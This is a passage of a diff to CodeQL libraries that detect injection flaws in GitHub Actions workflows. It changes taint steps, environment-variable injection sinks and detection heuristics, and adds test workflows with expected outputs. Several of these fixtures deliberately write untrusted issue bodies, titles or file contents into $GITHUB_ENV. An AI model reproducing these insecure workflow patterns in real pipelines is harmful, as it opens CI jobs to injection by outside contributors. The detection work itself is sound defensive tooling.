usernameEvent(context) and flag = "username" - or - pathEvent(context) and flag = "filename" + ) and + ( + regexp = titleEvent() and flag = "title" + or + regexp = urlEvent() and flag = "url" + or + regexp = textEvent() and flag = "text" + or + regexp = branchEvent() and flag = "branch" + or + regexp = labelEvent() and flag = "label" + or + regexp = emailEvent() and flag = "email" + or + regexp = usernameEvent() and flag = "username" + or + regexp = pathEvent() and flag = "filename" + ) and + normalizeExpr(context).regexpMatch("(?i).*" + wrapRegexp(regexp) + ".*") ) } @@ -258,17 +215,18 @@ class GitHubEventJsonSource extends RemoteFlowSource { this.asExpr() = e and context = e.getExpression() and ( - jsonEvent(context) and - ( - exists(string context_prefix | - contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), - context_prefix) and - normalizeExpr(context).matches("%" + context_prefix + "%") - ) - or - contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), _) and - normalizeExpr(context).regexpMatch(".*\\bgithub.event\\b.*") - ) + // only contexts for the triggering events are considered tainted. + // eg: for `pull_request`, we only consider `github.event.pull_request` + exists(string context_prefix | + contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), + context_prefix) and + normalizeExpr(context).matches("%" + context_prefix + "%") + ) and + normalizeExpr(context).regexpMatch("(?i).*" + wrapJsonRegexp(jsonEvent()) + ".*") + or + // github.event is taintes for all triggers + contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), _) and + normalizeExpr(context).regexpMatch("(?i).*" + wrapJsonRegexp("\\bgithub.event\\b") + ".*") ) and flag = "json" ) diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index bbc40d56e2b..4f4d80cc11b 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -32,15 +32,20 @@ class AdditionalTaintStep extends Unit { * echo "foo=$(echo $BODY)" >> $GITHUB_ENV */ predicate envToRunStep(DataFlow::Node pred, DataFlow::Node succ) { - exists(Run run, string varName, string value | - run.getInScopeEnvVarExpr(varName) = pred.asExpr() and - ( - writeToGitHubEnv(run, _, value) or - writeToGitHubOutput(run, _, value) or - writeToGitHubPath(run, value) - ) and - value.matches("%$" + ["", "{", "ENV{"] + varName + "%") and + exists(Run run, string var_name, string content, string value | + run.getInScopeEnvVarExpr(var_name) = pred.asExpr() and succ.asExpr() = run.getScriptScalar() + | + ( + writeToGitHubEnv(run, content) or + writeToGitHubOutput(run, content) + ) and + extractVariableAndValue(content, _, value) and + value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") + or + writeToGitHubPath(run, content) and + value = content and + value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") ) } @@ -55,25 +60,28 @@ predicate envToRunStep(DataFlow::Node pred, DataFlow::Node succ) { * echo "::set-output name=foo::$BODY" * echo "foo=$(echo $BODY)" >> $GITHUB_OUTPUT * echo "foo=$(echo $BODY)" >> "$GITHUB_OUTPUT" + * echo "::set-output name=step-output::$BODY" */ predicate envToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { - exists(Run run, string varName, string key, string value | + exists(Run run, string var_name, string content, string key, string value | + writeToGitHubOutput(run, content) and + extractVariableAndValue(content, key, value) and c = any(DataFlow::FieldContent ct | ct.getName() = key) and - pred.asExpr() = run.getInScopeEnvVarExpr(varName) and + pred.asExpr() = run.getInScopeEnvVarExpr(var_name) and succ.asExpr() = run and - writeToGitHubOutput(run, key, value) and - value.matches("%$" + ["", "{", "ENV{"] + varName + "%") + value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") ) } predicate envToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { - exists(Run run, string varName, string key, string value | + exists(Run run, string var_name, string content, string key, string value | + writeToGitHubEnv(run, content) and + extractVariableAndValue(content, key, value) and c = any(DataFlow::FieldContent ct | ct.getName() = key) and - pred.asExpr() = run.getInScopeEnvVarExpr(varName) and + pred.asExpr() = run.getInScopeEnvVarExpr(var_name) and // we store the taint on the enclosing job since the may not exist an implicit env attribute succ.asExpr() = run.getEnclosingJob() and - writeToGitHubEnv(run, key, value) and - value.matches("%$" + ["", "{", "ENV{"] + varName + "%") + isBashParameterExpansion(value, var_name, _, _) ) } @@ -83,25 +91,27 @@ predicate envToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow:: * - run: echo "::set-output name=id::$( 0 + value.matches("$(echo %") and value.indexOf(var_name) > 0 ) ) } diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index 12919004c03..ead69480d8a 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -9,21 +9,23 @@ abstract class EnvVarInjectionSink extends DataFlow::Node { } class EnvVarInjectionFromEnvVarSink extends EnvVarInjectionSink { EnvVarInjectionFromEnvVarSink() { - exists(Run run, Expression expr, string varname, string key, string value | - expr = run.getInScopeEnvVarExpr(varname) and - writeToGitHubEnv(run, key, value) and + exists(Run run, Expression expr, string var_name, string content, string value | + expr = run.getInScopeEnvVarExpr(var_name) and + writeToGitHubEnv(run, content) and + extractVariableAndValue(content, _, value) and run.getScriptScalar() = this.asExpr() and - value.matches("%$" + ["", "{", "ENV{"] + varname + "%") + value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") ) } } class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { EnvVarInjectionFromFileReadSink() { - exists(Run run, UntrustedArtifactDownloadStep step, string value | + exists(Run run, UntrustedArtifactDownloadStep step, string content, string value | this.asExpr() = run.getScriptScalar() and step.getAFollowingStep() = run and - writeToGitHubEnv(run, _, value) and + writeToGitHubEnv(run, content) and + extractVariableAndValue(content, _, value) and // TODO: add support for other commands like `<`, `jq`, ... value.regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\)"]) ) diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index 646dc35d1f4..3349b5b1121 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll @@ -5,7 +5,10 @@ abstract class PoisonableStep extends Step { } // source: https://github.com/boostsecurityio/poutine/blob/main/opa/rego/rules/untrusted_checkout_exec.rego#L16 private string dangerousActions() { result = - ["pre-commit/action", "oxsecurity/megalinter", "bridgecrewio/checkov-action", "ruby/setup-ruby", "actions/jekyll-build-pages"] + [ + "pre-commit/action", "oxsecurity/megalinter", "bridgecrewio/checkov-action", + "ruby/setup-ruby", "actions/jekyll-build-pages" + ] } class DangerousActionUsesStep extends PoisonableStep, UsesStep { @@ -70,14 +73,14 @@ class LocalActionUsesStep extends PoisonableStep, UsesStep { class EnvVarInjectionRunStep extends PoisonableStep, Run { EnvVarInjectionRunStep() { - exists(string value | + exists(string content, string value | // Heuristic: // Run step with env var definition based on file content. // eg: `echo "sha=$(cat test-results/sha-number)" >> $GITHUB_ENV` // eg: `echo "sha=$(> $GITHUB_ENV` - writeToGitHubEnv(this, _, value) and - // TODO: add support for other commands like `<`, `jq`, ... - value.regexpMatch(["\\$\\(", "`"] + ["ls\\s+", "cat\\s+", "<"] + ".*" + ["`", "\\)"]) + writeToGitHubEnv(this, content) and + extractVariableAndValue(content, _, value) and + value.matches("%" + ["ls ", "cat ", "jq ", "$(<"] + "%") ) } } diff --git a/ql/test/library-tests/.github/workflows/multiline.yml b/ql/test/library-tests/.github/workflows/multiline.yml index a112d4ee0f4..dafcd56bba9 100644 --- a/ql/test/library-tests/.github/workflows/multiline.yml +++ b/ql/test/library-tests/.github/workflows/multiline.yml @@ -31,3 +31,59 @@ jobs: cat <<-"EOF" > event.json ${{ toJson(github.event) }} EOF + - name: heredoc11 + run: | + cat >> $GITHUB_ENV << EOL + ${ISSUE_BODY} + FOO + EOL + - name: heredoc12 + run: | + cat > issue.txt << EOL + ${ISSUE_BODY} + FOO + EOL + - name: heredoc21 + run: | + cat << EOL >> $GITHUB_ENV + ${ISSUE_BODY} + FOO + EOL + - name: heredoc22 + run: | + cat < file.txt + Hello + World + EOF + - name: heredoc23 + run: | + cat <<-EOF >> "$GITHUB_ENV" + echo "FOO=$TITLE" + EOF + - name: line1 + run: | + echo REPO_NAME=$(cat issue.txt | sed 's/\\r/\\n/g' | grep -ioE '\\s*[a-z0-9_-]+/[a-z0-9_-]+\\s*$' | tr -d ' ') >> $GITHUB_ENV + - name: multiline1 + run: | + echo "PR_TITLE<> $GITHUB_ENV + echo "$TITLE" >> $GITHUB_ENV + echo "EOF" >> $GITHUB_ENV + - name: block11 + run: | + { + echo 'JSON_RESPONSE<> "$GITHUB_ENV" + - name: block12 + run: | + { + echo 'JSON_RESPONSE<> "$GITHUB_ENV" + - name: block13 + run: | + { + echo 'JSON_RESPONSE<> "$GITHUB_ENV" diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index 20db431fc24..18f72de36d1 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -4,18 +4,18 @@ files | .github/workflows/test.yml:0:0:0:0 | .github/workflows/test.yml | workflows | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:1:1:89:29 | on: | | .github/workflows/test.yml:1:1:40:53 | on: push | reusableWorkflows compositeActions jobs | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:9:5:89:29 | Job: Test | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | localJobs | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:9:5:89:29 | Job: Test | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | extJobs @@ -30,7 +30,17 @@ steps | .github/workflows/multiline.yml:15:9:20:6 | Run Step | | .github/workflows/multiline.yml:20:9:24:6 | Run Step | | .github/workflows/multiline.yml:24:9:30:6 | Run Step | -| .github/workflows/multiline.yml:30:9:33:14 | Run Step | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | | .github/workflows/test.yml:11:9:15:6 | Uses Step | | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | @@ -48,7 +58,17 @@ runSteps | .github/workflows/multiline.yml:15:9:20:6 | Run Step | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | | .github/workflows/multiline.yml:20:9:24:6 | Run Step | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | | .github/workflows/multiline.yml:24:9:30:6 | Run Step | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:30:9:33:14 | Run Step | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | cat < file.txt\nHello\nWorld\nEOF\n | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | ${{ github.event.pull_request.head.ref }} | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | echo ${{needs.job1.outputs.job_output}} | @@ -64,7 +84,7 @@ runExprs | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | -| .github/workflows/multiline.yml:30:9:33:14 | Run Step | .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | @@ -89,7 +109,27 @@ runStepChildren | .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | | .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | | .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:30:9:33:14 | Run Step | .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | .github/workflows/multiline.yml:34:15:34:23 | heredoc11 | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | .github/workflows/multiline.yml:40:15:40:23 | heredoc12 | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | .github/workflows/multiline.yml:46:15:46:23 | heredoc21 | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | .github/workflows/multiline.yml:52:15:52:23 | heredoc22 | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | .github/workflows/multiline.yml:58:15:58:23 | heredoc23 | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | .github/workflows/multiline.yml:63:15:63:19 | line1 | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | .github/workflows/multiline.yml:66:15:66:24 | multiline1 | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | .github/workflows/multiline.yml:71:15:71:21 | block11 | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | .github/workflows/multiline.yml:78:15:78:21 | block12 | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:85:15:85:21 | block13 | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:13:28:23 | simplesink2 | @@ -141,37 +181,107 @@ parentNodes | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | | .github/workflows/multiline.yml:2:3:2:14 | workflow_run | .github/workflows/multiline.yml:2:3:5:18 | workflow_run: | -| .github/workflows/multiline.yml:2:3:5:18 | workflow_run: | .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/multiline.yml:3:17:3:22 | Prev | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:2:3:5:18 | workflow_run: | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:3:17:3:22 | Prev | .github/workflows/multiline.yml:1:1:89:29 | on: | | .github/workflows/multiline.yml:3:17:3:22 | Prev | .github/workflows/multiline.yml:2:3:2:14 | workflow_run | | .github/workflows/multiline.yml:3:17:3:22 | Prev | .github/workflows/multiline.yml:2:3:5:18 | workflow_run: | -| .github/workflows/multiline.yml:5:9:5:17 | completed | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:5:9:5:17 | completed | .github/workflows/multiline.yml:1:1:89:29 | on: | | .github/workflows/multiline.yml:5:9:5:17 | completed | .github/workflows/multiline.yml:2:3:2:14 | workflow_run | | .github/workflows/multiline.yml:5:9:5:17 | completed | .github/workflows/multiline.yml:2:3:5:18 | workflow_run: | -| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/multiline.yml:9:14:9:26 | ubuntu-latest | .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/multiline.yml:9:14:9:26 | ubuntu-latest | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:11:9:15:6 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:9:5:89:29 | Job: Test | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:9:14:9:26 | ubuntu-latest | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:9:14:9:26 | ubuntu-latest | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | | .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:11:9:15:6 | Run Step | -| .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | | .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:15:9:20:6 | Run Step | -| .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | | .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:20:9:24:6 | Run Step | -| .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | | .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:24:9:30:6 | Run Step | -| .github/workflows/multiline.yml:30:9:33:14 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:30:9:33:14 | Run Step | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) 